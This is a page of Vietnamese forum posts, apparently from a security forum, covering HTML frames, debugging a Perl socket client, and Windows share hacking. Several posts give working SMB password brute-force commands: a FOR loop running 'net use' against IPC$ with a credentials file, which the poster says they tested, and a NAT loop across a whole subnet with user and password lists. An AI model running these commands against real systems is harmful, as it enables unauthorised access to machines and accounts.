Messages posted by: L0ng3ta

Tôi đã đưa cho bạn cái link rất cụ thể ? bạn có đọc chưa vậy hay là không muốn đọc. Nếu bạn đã đọc rồi tôi tin là bạn sẽ không hỏi tiếp câu này đâu.

Code:

<HTML>
<HEAD>
<TITLE>A simple frameset document</TITLE>
</HEAD>
<FRAMESET>
<FRAME src="" name="HVA forum">
</FRAMESET>
</HTML>

Bạn tạo thử cái này đặt tên nó là index.html thử chạy nó xem để ý cái url bên trên là cái gì ??

Nếu cách đơn giản này bạn còn chưa hiểu thì tôi khuyên thật tình là bạn khoan hãy tìm hiểu những cách khác như thế nào.

LimitExceed wrote:

Em đã cài Perl và chay đc đoạn code hello.pl như thế này bằng browser
#!c:\perl\bin\perl.exe
print "Content-type: text/html\n\n";
print "Hello, world!";
Nhưng sau đó lập trình socket thì ko thể chạy đc,báo lỗi.Đoạn code như này:
#!/usr/local/bin/perl
# file:tcp_echo_cli1.pl
# usage:tcp_echo_cli1.pl [host] [port]
# echo client,tcp version
use strict;
use Socket;
use IO::Handle;
my ($byte_out,$byte_in)=(0,0);//declare globals,create 2 global variables for keeping track of the number of bytes we send and receive.
my $host =shift || 'localhost' ;
my $port =shift ||getservbyname('echo','tcp');
my $protocol = getprotobyname('tcp') ;
$host =inet_aton($host) or die "$host :unknown host";
socket (SOCK,AF_INET,SOCK_STREAM,$protocol) or die "socket() failed:$!";
my $dest_addr=sockaddr_in($port,$host)
connect (SOCK,$dest_addr) or die "connect() failed: $!";
SOCK ->autoflush(1);
while (my $msg_out=<>{
print SOCK $msg_out;
my $msg_in=<SOCK>;
print $msg_in;
$bytes_out +=length($msg_out);
$bytes_in +=length($msg_in);
}
close SOCK
print STDERR "bytes_sent=$bytes_out,bytes_received=$bytes_in\n";
Vậy em phải làm gì để chạy đc code nay??Và có công cụ phát triển PERL nào giống PHP Expert hố trợ cho PHP ko ạ?

Bạn hãy để ý xem 2 dòng tôi bôi đậm có gì khác nhau ?? tại sau cái trên chạy và cái dưới không chạy.
Thêm nữa là đoạn code dưới muốn chạy thì chạy như thế nào để ý tiếp cái mầu đỏ

Dạo này tôi thấy rằng có một vài member mới đăng ký vì chưa hiểu nội qui sinh hoạt một phần nên gởi bài lung tung và bị warn. Theo tôi thì nếu có thể phiên bản sau nên có một PM tự động gởi tới một ai đó khi bị warn để người đó được biết, vì không phải ai mới vào diễn đàn điều biết xem cái này:

/hvaonline/forums/stats.html

Cách đơn giản nhất là bạn chỉ cần tạo một file index.html hoặc index.htm đặt ở ngoài (mà ngòai ở đây không phải là ngoài public_html mà là ngay tại public_html, và trong đó có một cái frame. để "chứa" http://..../forum/index.php ...

Bạn có thể tìm hiểu về frame tại đây.

http://www.w3.org/TR/html4/present/frames.html

Bà con xem thử xem có cái nào mình cần không

http://www.team509.com/download/docs/security/

@quanta : vừa mới xem qua cái link của bạn và phát hiện ra một điều là nat như là một lệnh ngoại trú đồng nghĩa với nó là một tool riêng biệt dành cho việc bruce force. Vậy có thể nói nó không khác gì lệnh net use về mặt ngữ nghĩa.

tạo một tệp tin, trong đó có chứa username và password tương ứng nhau . Ví dụ ta tạo 1 file credentials.txt :
[file: credentials.txt]
password username
admin Administrator
administrator Administrator
secret Administrator
........... .....................
sau đó dùng lệnh FOR trong Windows để dò password admin , cụ thể :
c:\>FOR /F "tokens=1,2*" %i in (credetials.txt) do net use (tên ổ đĩa): \\server\IPC$ %i /u:%j

Lệnh này lấy 2 "từ vị" ở mỗi dòng, và lấy "từ vị" đầu cho biến %i (password), và "từ" vị thứ 2 cho biến %j trong khi sử dụng lệnh net use cho resource IPC$, IPC$ ở đây có thể là ổ C$ hay D$, còn tên ổ đĩa bạn nên lấy những ổ "ảo", nghĩa là không có trên máy ví dụ ổ H: hay I: V:
Lệnh này đã được mình test thành công !

-----------------------------------------------------------------

Có rất nhiều chương trình để lấy pass theo kiểu chọn này, ở đây ta dùng chương trình NAT (NetBIOS Auditing Tool), chương trình này được sử dụng cho tất cả các PC ở class C :
D:\> FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt 192.168.202.%I >> nat_output.txt

p/s: cái bài tổng hợp này tôi cảm thấy có một điều bất ngờ là lại có cả đoạn code worm của tôi trong đó ... quả là hết nói.

kimsonha wrote:

Gởi L0ng3ta: em tưởng là em copy bị sai nhưng hóa ra không phải ,chổ
C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt
đúng là "nat" chứ không phải là "net use" đâu. Vậy "nat" là lệnh gì vậy anh. Anh có thể vao trang quantrimang.com để xem cho rõ ,đó là bài "Hacking PC resource share - Hướng đi và giải pháp "

Theo anh nghĩ thì nếu là Hacking PC resource share thì chủ yếu là dùng net use. Còn lệnh nat thì anh không hiểu ? em có thể nào cho anh cái link trực tiếp đến bài viết đó được không và chúng ta cùng nhau tìm hiểu em nhé.

Nếu không hiểu thì việc kế tiếp là nên học tiếng anh smilie

)

Muốn biết rõ về lệnh lặp for và tham số của nó bạn vào command line gõ for/? và đọc nó.

kimsonha wrote:

C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt "

==>lệnh này là lện Net use mới đúng , có nghĩa là bạn dựa vào danh sách user + password có sẵn trong userlist.txt để thử từng cái một.
Đây là một hình thức của bruce force.